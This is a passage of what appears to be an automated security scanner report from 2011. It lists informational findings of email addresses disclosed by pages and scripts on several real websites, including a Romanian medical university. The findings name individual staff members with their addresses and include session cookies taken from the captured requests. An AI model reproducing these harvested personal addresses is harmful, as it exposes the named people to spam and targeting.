HTTP/1.1 200 OK
Content-Length: 172238
Content-Type: application/x-javascript
Content-Location: http://realnetworks.com/WorkArea/java/ektron.js
Last-Modified: Sat, 31 Jul 2010 05:39:12 GMT
Accept-Ranges: bytes
ETag: "46c377b47230cb1:303c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 20:10:19 GMT

if ("undefined" == typeof $ektron)
{
/*
Ektron JavaScript Library
Copyright (c) 2008 Ektron, Inc.
All rights reserved

Instructions to upgrade this Ektron Li
...[SNIP]...
(Ektron.RegExp.rtrim,""); },

// method to work around bugs in jquery' offset() when element is nested inside relative/absolute elements
// from: http://www.mail-archive.com/jquery-en@googlegroups.com/msg72499.html
positionedOffset: function(elem) {
var offsetParent = elem.offsetParent(), offset = elem.offset(), position = elem.position();
if ( !/^body|html$/i.tes
...[SNIP]...

23.17. http://realnetworks.com/pressroom/index.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realnetworks.com
Path:	/pressroom/index.aspx

Issue detail

The following email address was disclosed in the response:

public_relations@real.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:11:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_documentH
...[SNIP]...
<a href="mailto:public_relations@real.com">public_relations@real.com</a>
...[SNIP]...

23.18. http://service.real.com/international/br/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://service.real.com
Path:	/international/br/

Issue detail

The following email address was disclosed in the response:

europe-br@mailca.custhelp.com

Request

GET /international/br/ HTTP/1.1
Host: service.real.com
Proxy-Connection: keep-alive
Referer: http://service.real.com/international/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RNsites=service02-0bKTJ8:200; __utma=54132522.596614694.1311107158.1311107158.1311107158.1; __utmb=54132522.1.10.1311107158; __utmc=54132522; __utmz=54132522.1311107158.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Server: Roxen.Challenger/1.3.122
P3P: CP="CAO NON DSP NID ADM DEV CUSi PSA OUR STP UNI PUR COM NAV INT STA"
Content-type: text/html
Last-Modified: Tue, 21 Jun 2011 18:22:01 GMT
Connection: close
MIME-Version: 1.0
Date: Tue, 19 Jul 2011 20:27:14 GMT
Content-length: 5552

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<a href="mailto:europe-br@mailca.custhelp.com">
...[SNIP]...

23.19. http://sharethis.com/account/signin-widget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sharethis.com
Path:	/account/signin-widget

Issue detail

The following email address was disclosed in the response:

feedback@sharethis.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
p3p: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 14139
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml" >
<
...[SNIP]...
<meta property="og:email" content="feedback@sharethis.com"/>
...[SNIP]...

23.20. http://sharethis.com/ext/adapter/ext/ext-base.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sharethis.com
Path:	/ext/adapter/ext/ext-base.js

Issue detail

The following email address was disclosed in the response:

licensing@extjs.com

Request

GET /ext/adapter/ext/ext-base.js HTTP/1.1
Host: sharethis.com
Proxy-Connection: keep-alive
Referer: http://sharethis.com/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==; SERVERID=i-1f43e274

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 18:18:19 GMT
ETag: "10d1a0-7d91-cf13b0c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
p3p: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 32145
Content-Type: application/x-javascript
Connection: close

/*
* Ext JS Library 3.0.0
* Copyright(c) 2006-2009 Ext JS, LLC
* licensing@extjs.com
* http://www.extjs.com/license
*/
window.undefined=window.undefined;Ext={version:"3.0"};Ext.apply=function(d,e,b){if(b){Ext.apply(d,b)}if(d&&e&&typeof e=="object"){for(var a in e){d[a]=e[a]}}return
...[SNIP]...

23.21. http://sharethis.com/ext/ext-all.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sharethis.com
Path:	/ext/ext-all.js

Issue detail

The following email addresses were disclosed in the response:

licensing@extjs.com
user@example.com

Request

GET /ext/ext-all.js HTTP/1.1
Host: sharethis.com
Proxy-Connection: keep-alive
Referer: http://sharethis.com/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==; SERVERID=i-1f43e274

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 18:18:19 GMT
ETag: "10d1a8-98730-cf13b0c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
p3p: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Type: application/x-javascript
Connection: close
Content-Length: 624432

/*
* Ext JS Library 3.0.0
* Copyright(c) 2006-2009 Ext JS, LLC
* licensing@extjs.com
* http://www.extjs.com/license
*/
Ext.DomHelper=function(){var s=null,j=/^(?:br|frame|hr|img|input|link|meta|range|spacer|wbr|area|param|col)$/i,l=/^table|tbody|tr|td$/i,p,m="afterbegin",n="afterend
...[SNIP]...
\/([\-\w]+\.)+\w{2,3}(\/[%\-\w]+(\.\w{2,})?)*(([\w\-\.\?\\\/+@&#;`~=%!]*)(\.\w{2,})?)*\/?)/i;return{email:function(e){return b.test(e)},emailText:'This field should be an e-mail address in the format "user@example.com"',emailMask:/[a-z0-9_\.\-@]/i,url:function(e){return a.test(e)},urlText:'This field should be a URL in the format "http://www.example.com"',alpha:function(e){return c.test(e)},alphaText:"This field sh
...[SNIP]...

23.22. http://sharethis.com/ext/resources/css/ext-all.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sharethis.com
Path:	/ext/resources/css/ext-all.css

Issue detail

The following email address was disclosed in the response:

licensing@extjs.com

Request

GET /ext/resources/css/ext-all.css HTTP/1.1
Host: sharethis.com
Proxy-Connection: keep-alive
Referer: http://sharethis.com/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==; SERVERID=i-1f43e274

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 18:18:19 GMT
ETag: "10d1e1-22f0c-cf13b0c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
p3p: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 143116
Content-Type: text/css
Connection: close

/*!
* Ext JS Library 3.0.0
* Copyright(c) 2006-2009 Ext JS, LLC
* licensing@extjs.com
* http://www.extjs.com/license
*/
html,body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,p,blockquote,th,td{margin:0;padding:0;}img,body,html{border:0;}address,caption,cite,code,d
...[SNIP]...

23.23. http://sharethis.com/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sharethis.com
Path:	/privacy

Issue detail

The following email address was disclosed in the response:

feedback@sharethis.com

Request

GET /privacy HTTP/1.1
Host: sharethis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
p3p: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 33617
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml" >

...[SNIP]...
<meta property="og:email" content="feedback@sharethis.com"/>
...[SNIP]...

23.24. http://sharethis.com/register previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sharethis.com
Path:	/register

Issue detail

The following email address was disclosed in the response:

feedback@sharethis.com

Request

GET /register HTTP/1.1
Host: sharethis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==; SERVERID=i-1f43e274; __uset=yes; __unam=8f891fa-13142cc749b-8ad1c19-4; __utma=79367510.1750911955.1311085721.1311085721.1311085721.1; __utmb=79367510.3.9.1311085721; __utmc=79367510; __utmz=79367510.1311085721.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
p3p: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 13025
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml" >
<
...[SNIP]...
<meta property="og:email" content="feedback@sharethis.com"/>
...[SNIP]...

23.25. http://umfcluj.ro/js/jquery.emptyOnFocus.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/js/jquery.emptyOnFocus.js

Issue detail

The following email address was disclosed in the response:

andrei.eftimie@netlogiq.ro

Request

GET /js/jquery.emptyOnFocus.js HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 24 Jul 2008 09:23:50 GMT
Accept-Ranges: bytes
ETag: "0d765fb6eedc81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:12:29 GMT
Content-Length: 1271

/*
* @author Andrei Eftimie
* @email andrei.eftimie@netlogiq.ro
* @copyright (c) Netlogiq
* @web http://www.netlogiq.ro
* http://www.netlogiq.com
*
* Required Markup
* ---------------
* <div class="div">
...[SNIP]...

23.26. http://umfcluj.ro/js/jquery.hoverIntent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/js/jquery.hoverIntent.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /js/jquery.hoverIntent.js HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 05 May 2008 09:12:42 GMT
Accept-Ranges: bytes
ETag: "021312c90aec81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:12:29 GMT
Content-Length: 1609

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

23.27. http://umfcluj.ro/lista.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/lista.aspx

Issue detail

The following email addresses were disclosed in the response:

andreea.cziriek@umfcluj.ro
cgheran@umfcluj.ro
dionescu@umfcluj.ro
rbadea@umfcluj.ro
scd@umfcluj.ro

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:14 GMT
Content-Length: 84035

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...
<br />
e-mail: rbadea@umfcluj.ro<br />
...[SNIP]...
<br />
e-mail: dionescu@umfcluj.ro<br />
...[SNIP]...
<br />
e-mail: cgheran@umfcluj.ro<br />
...[SNIP]...
<br />
e-mail: scd@umfcluj.ro <br />
...[SNIP]...
<br />
e-mail: andreea.cziriek@umfcluj.ro<br />
...[SNIP]...

23.28. http://umfcluj.ro/lista.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/lista.aspx

Issue detail

The following email addresses were disclosed in the response:

alaszlo@umfcluj.ro
sdudea@umfcluj.ro

Request

GET /lista.aspx?t=Masterat-Prezentare HTTP/1.1
Host: umfcluj.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/en
Cookie: __utma=234819994.717153536.1311096678.1311096678.1311097986.2; __utmb=234819994.1.10.1311097986; __utmz=234819994.1311097986.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; ASP.NET_SessionId=1olglu55bypnb2zmxxbaxl55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:57:28 GMT
Content-Length: 62710

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<br />
Vice-Chancellor: PhD Prof. Sorin Dudea, e-mail: sdudea@umfcluj.ro<br />
Secretary: Aurora Laszlo, e-mail: alaszlo@umfcluj.ro<br />
...[SNIP]...

23.29. http://umfcluj.ro/lista.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/lista.aspx

Issue detail

The following email address was disclosed in the response:

dri@umfcluj.ro

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:46:00 GMT
Content-Length: 64369

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<br />
e-mail: dri@umfcluj.ro<br />
...[SNIP]...

23.30. http://umfcluj.ro/lista.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/lista.aspx

Issue detail

The following email address was disclosed in the response:

bibliotecaumf@umfcluj.ro

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:19 GMT
Content-Length: 66728

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<a href="javascript:location.href='mailto:'+String.fromCharCode(98,105,98,108,105,111,116,101,99,97,117,109,102,64,117,109,102,99,108,117,106,46,114,111)+'?'">bibliotecaumf@umfcluj.ro </a>
...[SNIP]...

23.31. http://umfcluj.ro/lista.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/lista.aspx

Issue detail

The following email addresses were disclosed in the response:

cristianbarsu@yahoo.com
dfodor@umfcluj.ro
hcolosi@umfcluj.ro
mbaciut@yahoo.com
ofelia.crisan@umfcluj.ro
sclichici@umfcluj.ro

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:21 GMT
Content-Length: 62576

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<br />
Mihaela B..ciu.. (mbaciut@yahoo.com), <br />
Cristian Bârsu (cristianbarsu@yahoo.com), <br />
Simona Clichici (sclichici@umfcluj.ro), <br />
Hora..iu Colo..i (hcolosi@umfcluj.ro), <br />
Ofelia Cri..an (ofelia.crisan@umfcluj.ro), <br />
Daniela Fodor (dfodor@umfcluj.ro)<br />
...[SNIP]...

23.32. http://umfcluj.ro/lista.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/lista.aspx

Issue detail

The following email address was disclosed in the response:

decanat_stoma@umfcluj.ro

Request

GET /lista.aspx?t=Medicina-dentara-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.8.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:21 GMT
Content-Length: 82704

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...
<br />
Email : decanat_stoma@umfcluj.ro<br />
...[SNIP]...

23.33. http://umfcluj.ro/lista.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/lista.aspx

Issue detail

The following email addresses were disclosed in the response:

gbaciut@umfcluj.ro
mihaela_rusu@umfcluj.ro
prorectoratpostuniversitar@umfcluj.ro

Request

GET /lista.aspx?t=Studii-posuniversitare-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.5.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:16 GMT
Content-Length: 81034

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...
<br />
Telefon catedr..: 0264-596291, e-mail: gbaciut@umfcluj.ro<br />
...[SNIP]...
<br />
E-mail: mihaela_rusu@umfcluj.ro<br />
...[SNIP]...
<br />
E-mail: prorectoratpostuniversitar@umfcluj.ro<br />
...[SNIP]...

23.34. http://umfcluj.ro/lista.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/lista.aspx

Issue detail

The following email address was disclosed in the response:

decanat_mg@umfcluj.ro

Request

GET /lista.aspx?t=Medicina-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.6.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:19 GMT
Content-Length: 90484

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...
<br />
e-mail: decanat_mg@umfcluj.ro<br />
...[SNIP]...

23.35. http://w.sharethis.com/button/buttons.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://w.sharethis.com
Path:	/button/buttons.js

Issue detail

The following email address was disclosed in the response:

support@sharethis.com

Request

GET /button/buttons.js HTTP/1.1
Host: w.sharethis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/products/im
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Last-Modified: Thu, 14 Jul 2011 20:30:13 GMT
Cache-Control: public
Content-Length: 48247
Date: Tue, 19 Jul 2011 14:26:36 GMT
Connection: close
Vary: Accept-Encoding

var cookie=new function(){return{setCookie:function(d,f,h){if(h){var c=new Date();c.setTime(c.getTime()+(h*24*60*60*1000));var a="; expires="+c.toGMTString()}else{var a=""}var b=d+"="+escape(f)+a;var
...[SNIP]...
turn false}stLight.processSTQ();stLight.readyRun=true;if(stLight.publisher==null){if(typeof(window.console)!=="undefined"){try{console.log("Please specify a ShareThis Publisher Key \nFor help, contact support@sharethis.com")}catch(a){}}}var b="share4x";if(switchTo5x){b="share5x"}if(stLight.hasButtonOnPage()){if(stLight.loadedFromBar){if(switchTo5x){b="bar_share5x"}else{b="bar_share4x"}}}else{if(stLight.loadedFromBar){b=
...[SNIP]...

23.36. http://widgets.outbrain.com/outbrainWidget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.outbrain.com
Path:	/outbrainWidget.js

Issue detail

The following email address was disclosed in the response:

feedback@outbrain.com

Request

GET /outbrainWidget.js HTTP/1.1
Host: widgets.outbrain.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: obuid=34e83892-8848-4a54-a4d4-8bdbba750320; _lvs2="1tAU7QKQIVo="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:11 GMT
Server: Apache
Last-Modified: Mon, 18 Jul 2011 06:55:11 GMT
ETag: "100a9f-23523-4a8527afc91c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 144675
Content-Type: application/x-javascript
Cache-Control: private, max-age=604800
Age: 0
Expires: Tue, 26 Jul 2011 20:44:11 GMT
Connection: Keep-Alive

window.OB_releaseVer="40506";var ObStartTime=typeof ObStartTime!="undefined"?ObStartTime:(new Date).getTime(),outbrain_browsers=typeof outbrain_browsers=="object"?outbrain_browsers:new (function(){thi
...[SNIP]...
<a href='mailto:feedback@outbrain.com'>feedback@outbrain.com</a>
